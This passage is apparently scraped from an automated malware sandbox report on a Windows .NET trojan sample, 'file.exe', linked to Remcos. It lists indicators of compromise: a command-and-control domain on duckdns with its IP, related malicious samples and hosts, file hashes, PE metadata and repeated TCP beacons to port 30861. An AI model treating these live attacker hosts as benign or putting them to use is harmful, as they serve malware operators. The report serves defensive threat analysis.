              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              pekonomia.duckdns.org7%VirustotalBrowse
              pekonomia.duckdns.org100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              pekonomia.duckdns.org
              		192.169.69.26
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              pekonomia.duckdns.orgtrue
              • 7%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpaspnet_compiler.exefalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://geoplugin.net/json.gp/Cfile.exe, 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              192.169.69.26
              		pekonomia.duckdns.orgUnited States
              		23033WOWUStrue

              General Information

              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:882711
              Start date and time:2023-06-06 17:22:07 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 9m 3s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:3
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@3/1@68/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 87.2% (good quality ratio 82.6%)
              • Quality average: 83.5%
              • Quality standard deviation: 26.7%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 41
              • Number of non-executed functions: 207
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): audiodg.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Report size getting too big, too many NtDeviceIoControlFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              192.169.69.26http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
              • www.secure-0fflce-o365.duckdns.org/
              http://muqzwpkojc.duckdns.orgGet hashmaliciousUnknownBrowse
              • muqzwpkojc.duckdns.org/
              http://jrljsybkku.duckdns.orgGet hashmaliciousUnknownBrowse
              • jrljsybkku.duckdns.org/
              last.exeGet hashmaliciousRedLineBrowse
              • siyatermi.duckdns.org:17044/
              5BDF181C629182A48CE6810CD0987FB0C1242DED4C9E7.exeGet hashmaliciousRedLineBrowse
              • redline957.duckdns.org:35253/IRemotePanel
              1ZXSAOPKH09SA_PAYMENT-COPY.jsGet hashmaliciousVjW0rmBrowse
              • jamnnd.duckdns.org:8024/Vre
              LB9lJxaVP7.exeGet hashmaliciousUnknownBrowse
              • cpanelcustomershost.duckdns.org/SystemEnv/uploads/newsoftware-tester_Gurledjm.jpg
              Scan0049938_pdf.com.exeGet hashmaliciousUnknownBrowse
              • cpanelcustomershost.duckdns.org/SystemEnv/uploads/newsoftware-tester_Wrpqkawe.bmp
              CkWJfCDAeO.exeGet hashmaliciousAsyncRAT, DcRat, RedLineBrowse
              • siyatermi.duckdns.org:17044/
              payment copy.exeGet hashmaliciousLokibotBrowse
              • abixmaly.duckdns.org/binge/fre.php
              Product samples.exeGet hashmaliciousLokibotBrowse
              • abixmaly.duckdns.org/binge/fre.php
              Invoice and BL.exeGet hashmaliciousLokibotBrowse
              • abixmaly.duckdns.org/binge/fre.php
              Samples and listed Products.exeGet hashmaliciousLokibotBrowse
              • abixmaly.duckdns.org/binge/fre.php
              Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exeGet hashmaliciousLokibotBrowse
              • abixmaly.duckdns.org/binge/fre.php
              MglhrJiLUL.exeGet hashmaliciousAzorultBrowse
              • 195.245.112.115/index.php
              On35KJkYT4.exeGet hashmaliciousAzorultBrowse
              • 195.245.112.115/index.php
              Order_List.xlsxGet hashmaliciousUnknownBrowse
              • dubaisupport.duckdns.org/file.exe

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              pekonomia.duckdns.orgfile.exeGet hashmaliciousRemcosBrowse
              • 192.169.69.26
              file.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              file.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              Modis_list.xlsGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              w25K2LiB53.rtfGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              RocEMw085M.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              Modis_list.docx.docGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              Modis_list.xlsGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              01550399.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              c3UCWcqpI0.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              Modis_list.xlsGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              04273299.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              05118599.exeGet hashmaliciousRemcosBrowse
              • 185.225.74.112
              GjzoAhk1LN.exeGet hashmaliciousRemcosBrowse
              • 134.19.179.211

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WOWUSfile.exeGet hashmaliciousRemcosBrowse
              • 192.169.69.26
              RFQ-ORS-687.exeGet hashmaliciousGuLoaderBrowse
              • 43.230.202.51
              Backdoor.MSIL.NanoBot.betf-d2a573edc893e24fbf.exeGet hashmaliciousNanocoreBrowse
              • 192.169.69.26
              HEUR-Trojan.MSIL.Taskun.gen-1617174ffdba50f5e.exeGet hashmaliciousNanocoreBrowse
              • 192.169.69.26
              Pago.jarGet hashmaliciousSTRRATBrowse
              • 192.169.69.25
              Payment_Advice.jarGet hashmaliciousSTRRATBrowse
              • 192.169.69.25
              1CZHwiMx1Y.rtfGet hashmaliciousFormBookBrowse
              • 43.230.202.16
              G5EDiMSfst.rtfGet hashmaliciousAgentTeslaBrowse
              • 43.230.202.16
              PO-GOE-23-1128_MR-23-08532.xlsGet hashmaliciousUnknownBrowse
              • 43.230.202.16
              Orden0383492.xlsGet hashmaliciousUnknownBrowse
              • 43.230.202.16
              Payment_Advice.jarGet hashmaliciousSTRRATBrowse
              • 192.169.69.25
              PO#23355.exeGet hashmaliciousGuLoaderBrowse
              • 43.230.202.51
              PO#23355.exeGet hashmaliciousGuLoaderBrowse
              • 43.230.202.51
              PLAYGROUND_PROJECT_-_2022089928_-_KDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 172.93.222.140
              P05jmXYKpr.exeGet hashmaliciousNanocoreBrowse
              • 192.169.69.26
              j2RMII0d3S.exeGet hashmaliciousNanocoreBrowse
              • 192.169.69.26
              jw2ILbVCX7.exeGet hashmaliciousNanocoreBrowse
              • 192.169.69.26
              Elmo-_05230342.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 43.230.202.51
              RFQ_39250100.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 43.230.202.51
              ZAINAB_JASSIM_Request_for_Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 43.230.202.51

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

              Download File
              Process:C:\Users\user\Desktop\file.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):226
              Entropy (8bit):5.354940450065058
              Encrypted:false
              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
              MD5:B10E37251C5B495643F331DB2EEC3394
              SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
              SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
              SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
              Malicious:true
              Reputation:high, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

              Static File Info

              General

              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.962338247780781
              TrID:
              • Win64 Executable GUI Net Framework (217006/5) 49.88%
              • Win64 Executable GUI (202006/5) 46.43%
              • Win64 Executable (generic) (12005/4) 2.76%
              • Generic Win/DOS Executable (2004/3) 0.46%
              • DOS Executable Generic (2002/1) 0.46%
              File name:file.exe
              File size:500224
              MD5:66108176e22e6f9513a62c76f2185468
              SHA1:a05e217104b39485fbb4ce3cda9cb65b20960ccb
              SHA256:e1eb3fe18ad660415f59eaac2c768afa1b20e07f107dfc207da8b0880a888aaf
              SHA512:646233ba810efba1ab506041d44d698590e30c88ce22f258fcb7eb8ef4435866fb9d7ca1f8d1067c7805c0275c63c690ca98a4b1efbf635fc7b3df8f8f9ca243
              SSDEEP:12288:oeV56CrxH8gnW6yhQNmPLXWu38n4RQgsAlVF+LpnN7TihIHVQMfT:deCrxsvh/Wusn4RHZvF+lnd/
              TLSH:F7B4129CBB1079CFC897D630AA880C28AA94B437970BC343B497255E9A1D2CFCF555E7
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..............0.................. ....@...... ....................................`...@......@............... .....

              File Icon

              Icon Hash:90cececece8e8eb0

              Static PE Info

              General

              Entrypoint:0x400000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x647F07F4 [Tue Jun 6 10:18:28 2023 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:

              Entrypoint Preview

              Instruction
              dec ebp
              pop edx
              nop
              add byte ptr [ebx], al
              add byte ptr [eax], al
              add byte ptr [eax+eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x596.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x7b7c40x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000x798030x79a00False0.9617564876670093data7.966829562881022IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0x7c0000x5960x600False0.416015625data4.0776365849895475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_VERSION0x7c0a00x30cdata
              RT_MANIFEST0x7c3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jun 6, 2023 17:23:10.020539045 CEST4969430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:10.239814043 CEST3086149694192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:10.248241901 CEST4969430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:10.261132956 CEST4969430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:10.739983082 CEST3086149694192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:11.874109983 CEST4969530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:12.320915937 CEST3086149695192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:12.321114063 CEST4969530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:12.330519915 CEST4969530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:12.815340042 CEST3086149695192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:13.847930908 CEST4969630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:14.151731968 CEST3086149696192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:14.152007103 CEST4969630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:14.163101912 CEST4969630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:14.464538097 CEST3086149696192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:15.611469030 CEST4969730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:18.011476994 CEST3086149697192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:18.011765957 CEST4969730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:18.021563053 CEST4969730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:18.598541975 CEST3086149697192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:19.833255053 CEST4969830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:20.497962952 CEST3086149698192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:20.498182058 CEST4969830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:20.507790089 CEST4969830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:20.711457968 CEST3086149698192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:21.749228001 CEST4969930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:22.073091030 CEST3086149699192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:22.073292971 CEST4969930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:22.468920946 CEST4969930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:22.811598063 CEST3086149699192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:23.864869118 CEST4970030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:24.345674992 CEST3086149700192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:24.345782042 CEST4970030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:24.351846933 CEST4970030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:24.563781023 CEST3086149700192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:25.605225086 CEST4970130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:25.980650902 CEST3086149701192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:25.980848074 CEST4970130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:25.988635063 CEST4970130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:26.297305107 CEST3086149701192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:29.397516966 CEST4970230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:29.828934908 CEST3086149702192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:29.829189062 CEST4970230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:29.838835001 CEST4970230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:30.092890024 CEST3086149702192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:31.220876932 CEST4970330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:31.435878992 CEST3086149703192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:31.436007977 CEST4970330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:31.442682981 CEST4970330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:31.757859945 CEST3086149703192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:32.807379961 CEST4970430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:33.099116087 CEST3086149704192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:33.099446058 CEST4970430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:33.108616114 CEST4970430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:33.503370047 CEST3086149704192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:34.553211927 CEST4970530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:34.864063978 CEST3086149705192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:34.864389896 CEST4970530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:34.877161980 CEST4970530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:35.090729952 CEST3086149705192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:36.128022909 CEST4970630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:36.440148115 CEST3086149706192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:36.440316916 CEST4970630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:36.446348906 CEST4970630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:36.637808084 CEST3086149706192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:37.672673941 CEST4970730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:37.987435102 CEST3086149707192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:37.987632036 CEST4970730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:38.043175936 CEST4970730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:38.333920956 CEST3086149707192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:39.645679951 CEST4970830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:40.000320911 CEST3086149708192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:40.000567913 CEST4970830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:40.444880962 CEST4970830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:40.715411901 CEST3086149708192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:41.754580021 CEST4970930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:41.954874992 CEST3086149709192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:41.956939936 CEST4970930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:41.965553999 CEST4970930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:42.352693081 CEST3086149709192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:43.387157917 CEST4971030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:43.693973064 CEST3086149710192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:43.694065094 CEST4971030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:43.700570107 CEST4971030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:44.025559902 CEST3086149710192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:45.074491978 CEST4971430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:45.292243004 CEST3086149714192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:45.292365074 CEST4971430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:45.300174952 CEST4971430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:45.514847994 CEST3086149714192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:46.565622091 CEST4971530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:46.830353975 CEST3086149715192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:46.830677986 CEST4971530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:46.837193012 CEST4971530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:47.192370892 CEST3086149715192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:48.331861973 CEST4971630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:48.544203997 CEST3086149716192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:48.544301987 CEST4971630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:48.553767920 CEST4971630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:48.844855070 CEST3086149716192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:49.876605034 CEST4971730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:50.208838940 CEST3086149717192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:50.211004972 CEST4971730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:50.218995094 CEST4971730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:50.914519072 CEST4971730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:51.945763111 CEST4971730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:52.452545881 CEST3086149717192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:53.487447023 CEST4971830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:54.112492085 CEST3086149718192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:54.115437031 CEST4971830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:54.121334076 CEST4971830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:54.436234951 CEST3086149718192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:55.530462027 CEST4971930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:55.770064116 CEST3086149719192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:55.773519993 CEST4971930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:55.799678087 CEST4971930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:56.352372885 CEST4971930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:56.398796082 CEST3086149719192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:56.668972015 CEST3086149719192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:57.425400972 CEST4972030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:57.745258093 CEST3086149720192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:57.745419979 CEST4972030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:57.751274109 CEST4972030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:58.242929935 CEST3086149720192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:59.433932066 CEST4972130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:59.878772974 CEST3086149721192.169.69.26192.168.2.4
              Jun 6, 2023 17:23:59.879043102 CEST4972130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:23:59.886296034 CEST4972130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:00.107762098 CEST3086149721192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:01.145569086 CEST4972230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:01.366851091 CEST3086149722192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:01.366976023 CEST4972230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:01.373670101 CEST4972230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:01.874022007 CEST3086149722192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:02.919182062 CEST4972330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:03.387455940 CEST3086149723192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:03.387676001 CEST4972330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:03.397203922 CEST4972330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:03.611495972 CEST3086149723192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:04.651916981 CEST4972430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:07.171287060 CEST3086149724192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:07.172282934 CEST4972430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:07.178219080 CEST4972430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:07.410247087 CEST3086149724192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:08.439862013 CEST4972530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:08.764863968 CEST3086149725192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:08.764964104 CEST4972530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:08.771488905 CEST4972530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:09.276351929 CEST3086149725192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:10.376948118 CEST4972630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:10.867620945 CEST3086149726192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:10.867831945 CEST4972630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:10.874739885 CEST4972630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:11.170367956 CEST3086149726192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:12.216418028 CEST4972730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:12.682782888 CEST3086149727192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:12.682921886 CEST4972730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:12.688880920 CEST4972730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:13.084945917 CEST3086149727192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:14.111223936 CEST4972830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:14.712141037 CEST3086149728192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:14.713109016 CEST4972830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:14.756300926 CEST4972830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:15.007545948 CEST3086149728192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:16.458566904 CEST4972930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:16.714849949 CEST3086149729192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:16.715060949 CEST4972930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:16.722671032 CEST4972930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:17.183624029 CEST3086149729192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:18.342468023 CEST4973030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:18.928747892 CEST3086149730192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:18.928982973 CEST4973030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:18.938545942 CEST4973030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:19.392245054 CEST3086149730192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:20.530495882 CEST4973130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:20.742580891 CEST3086149731192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:20.742724895 CEST4973130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:20.748797894 CEST4973130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:21.047579050 CEST3086149731192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:22.101335049 CEST4973230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:22.308454990 CEST3086149732192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:22.308595896 CEST4973230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:22.314699888 CEST4973230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:22.519577980 CEST3086149732192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:23.551947117 CEST4973330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:23.976948023 CEST3086149733192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:23.977226973 CEST4973330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:23.983150005 CEST4973330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:24.255177975 CEST3086149733192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:25.316834927 CEST4973430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:25.619920015 CEST3086149734192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:25.620073080 CEST4973430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:25.629213095 CEST4973430861192.168.2.4192.169.69.26
